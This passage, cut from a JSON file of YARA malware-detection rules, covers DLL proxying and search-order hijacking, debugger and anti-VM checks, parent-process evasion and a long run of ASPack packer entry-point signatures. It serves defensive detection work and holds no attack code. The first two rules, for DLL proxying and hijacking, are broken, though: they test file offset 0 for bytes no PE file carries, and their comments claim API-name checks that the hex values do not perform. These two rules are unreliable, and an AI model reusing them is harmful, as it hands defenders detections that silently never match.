            "rule": "rule DLLProxying {\r\n  condition:\r\n    // Check for presence of DLL_PROCESS_ATTACH in DllMain function\r\n    uint16(0) == 0x6461 and (\r\n      // Check for the presence of LoadLibrary, which is used to load the legitimate DLL\r\n      uint32(2) == 0x6C6C6100 and uint32(6) == 0x6574726F and\r\n      \r\n      // Check for the presence of GetProcAddress, which is used to retrieve the addresses of the functions in the legitimate DLL\r\n      uint32(10) == 0x72630067 and uint32(14) == 0x61647079 and uint32(18) == 0x61636F00 and uint32(22) == 0x0072696E and\r\n      \r\n      // Check for the presence of a function that will be used to redirect function calls to the legitimate DLL\r\n      // This example uses a function named \"ProxyFunction\", but the function name can be anything\r\n      uint32(26) == 0x646E6900 and uint32(30) == 0x00667379\r\n    )\r\n    // Check for presence of dllexport attribute on the function that redirects calls to the legitimate DLL\r\n    // This example uses a function named \"ProxyFunction\", but the function name can be anything\r\n    and (pe.exports(\"ProxyFunction\") or pe.exports(\"ProxyFunction@0\"))\r\n}"
        },
        {
            "id": 123,
            "key": "yara_dllsearchorderhijacking",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DLLSearchOrderHijacking",
            "rule": "rule DLLHijacking {\r\n  condition:\r\n    // Check for presence of DLL_PROCESS_ATTACH in DllMain function\r\n    uint16(0) == 0x6461 and (\r\n      // Check for the presence of CreateThread, which is used to start the main function\r\n      uint32(2) == 0x74006872 and uint32(6) == 0x00006563 and uint32(10) == 0x74616843 and\r\n      \r\n      // Check for the presence of Main function\r\n      uint32(14) == 0x6E69006D and uint32(18) == 0x0064614D\r\n    )\r\n    // Check for presence of dllexport attribute\r\n    and (pe.exports(\"DnsFreeConfigStructure\") or pe.exports(\"DnsFreeConfigStructure@0\"))\r\n}"
        },
        {
            "id": 4,
            "key": "yara_debuggercheck_globalflags",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DebuggerCheck_GlobalFlags",
            "rule": "rule DebuggerCheck__GlobalFlags  {\r\n    meta:\r\n\tdescription = \"Rule to detect NtGlobalFlags debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = \"NtGlobalFlags\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "id": 6,
            "key": "yara_debuggercheck__remoteapi",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DebuggerCheck__RemoteAPI",
            "rule": "rule DebuggerCheck__RemoteAPI {\r\n    meta:\r\n        description = \"Rule to detect RemoteAPI debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 =\"CheckRemoteDebuggerPresent\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "id": 127,
            "key": "yara_detectparentprocess",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DetectParentProcess",
            "rule": "rule ParentProcessEvasion\r\n{\r\n    strings:\r\n        // Check for the CreateToolhelp32Snapshot() function call\r\n        $create_snapshot = \"CreateToolhelp32Snapshot\"\r\n\r\n        // Check for the Process32First() function call\r\n        $process32_first = \"Process32First\"\r\n\r\n        // Check for the Process32Next() function call\r\n        $process32_next = \"Process32Next\"\r\n\r\n        // Check for the GetCurrentProcessId() function call\r\n        $get_current_pid = \"GetCurrentProcessId\"\r\n\r\n    condition:\r\n        // Check if all the required strings are present in the code\r\n        all of them\r\n}"
        },
        {
            "id": 160,
            "key": "yara_detect_alkhaser_antidebug_writewatch",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_AlKhaser_AntiDebug_WriteWatch",
            "rule": "rule YARA_Detect_AlKhaser_AntiDebug_WriteWatch\r\n{\r\n    meta:\r\n        description = \"Default invalid parameter values of Al-Khaser's Anti-Debug technique (VirtualAlloc/MEM_WRITE_WATCH). Used for checking API hooks in debuggers/sandboxes.\"\r\n        author = \"@albertzsigovits\"\r\n        date = \"2024-07-10\"\r\n        reference = \"https://github.com/LordNoteworthy/al-khaser/blob/967afa0d783ff9625caf1b069e3cd1246836b09f/al-khaser/AntiDebug/WriteWatch.cpp#L85\"\r\n        sha256 = \"e07383f6a340d8422a69b1d40cf848652165517407f7d0dc7260eed4a76499b3\"\r\n\r\n    strings:\r\n        $ = \"%ThisIsAnInvalidEnvironmentVariableName?[]<>@\\\\;*!-{}#:/~%\" ascii wide\r\n        $ = \"%ThisIsAnInvalidFileName?[]<>@\\\\;*!-{}#:/~%\" ascii wide\r\n    condition:\r\n        uint16(0) == 0x5A4D\r\n        and uint32(uint32(0x3C)) == 0x00004550\r\n        and any of them\r\n}"
        },
        {
            "id": 8,
            "key": "yara_detect_antivmwithtemperature",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_AntiVMWithTemperature",
            "rule": "rule Detect_AntiVMWithTemperature {\r\n    meta:\r\n        description = \"Rule to detect AntiVMwithTemperature technique\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = {72 6f 6f 74 5c 57 4d 49}\r\n        // root\\WMI\r\n        $s2 = {53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 4d 53 41 63 70 69 5f 54 68 65 72 6d 61 6c 5a 6f 6e 65 54 65 6d 70 65 72 61 74 75 72 65}\r\n        // SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n        $s3 = {43 75 72 72 65 6e 74 54 65 6d 70 65 72 61 74 75 72 65}\r\n        //  CurrentTemperature\r\n    \r\n    condition:\r\n    all of them\r\n}"
        },
        {
            "id": 109,
            "key": "yara_detect_aspack",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Aspack",
            "rule": "rule ASPack_v107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 }\r\n        $b = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPAck_1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 ?? ?? EB }\r\n        $b = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 00 00 75 15 FE 85 74 7C 43 00 E8 1D 00 00 00 E8 F7 01 00 00 E8 8E 02 00 00 8B 85 75 7C 43 00 03 85 89 7C 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D }\r\n        $b = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerAspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED CE 3A 44 00 B8 C8 3A 44 00 03 C5 2B 85 B5 3E 44 00 89 85 C1 3E 44 00 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? ?? ?D ?? ?? ?? ?? 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASPack_212_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 
89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_211d_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1083: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E 44 00 0F 85 17 05 00 00 8D 85 D1 50 44 00 50 FF 95 94 51 44 00 89 85 CD 50 44 00 8B F8 8D 9D DE 50 44 00 53 50 FF 95 90 51 44 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_102a_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 ?? ?? 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 3D }\r\n        $b = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Aspack_v212_wwwaspackcom: PEiD\r\n{\r\n    strings:\r\n        $a = { ?8 ?? ?0 00 ?? ?? ?? ?? ?D ?? ?? ?? ?? ?? ?? ?? ?? ?? 5? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F ?? ?? ?3 ?? ?? ?? 8? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?F 95 ?? ?? ?? ?? 8? 
}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v100b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? 
E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211c_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b_by: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D B8 03 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 
80 BD 01 DE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_100b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 92 1A 44 00 B8 8C 1A 44 00 03 C5 2B 85 CD 1D 44 00 89 85 D9 1D 44 00 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2xx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 3E D9 43 B8 38 03 C5 2B 85 0B DE 43 89 85 17 DE 43 80 BD 01 DE 43 75 15 FE 85 01 DE 43 E8 1D E8 79 02 E8 12 03 8B }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 
0F B6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_104b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? 00 B8 ?? ?? ?? 00 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? 00 80 BD 08 9D ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_107b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED CE 3A 44 B8 C8 3A 44 03 C5 2B 85 B5 3E 44 89 85 C1 3E 44 80 BD AC 3E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_or_10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 ?? ?? ?? E9 EB 04 5D 45 55 C3 E8 01 ?? ?? ?? EB 5D BB ED FF FF FF 03 DD 81 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D 55 81 ED 39 39 44 ?? C3 E9 59 }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v211c: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 ?? ?? ?? EB 09 5D }\r\n        $b = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 
03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }\r\n    condition:\r\n        $a 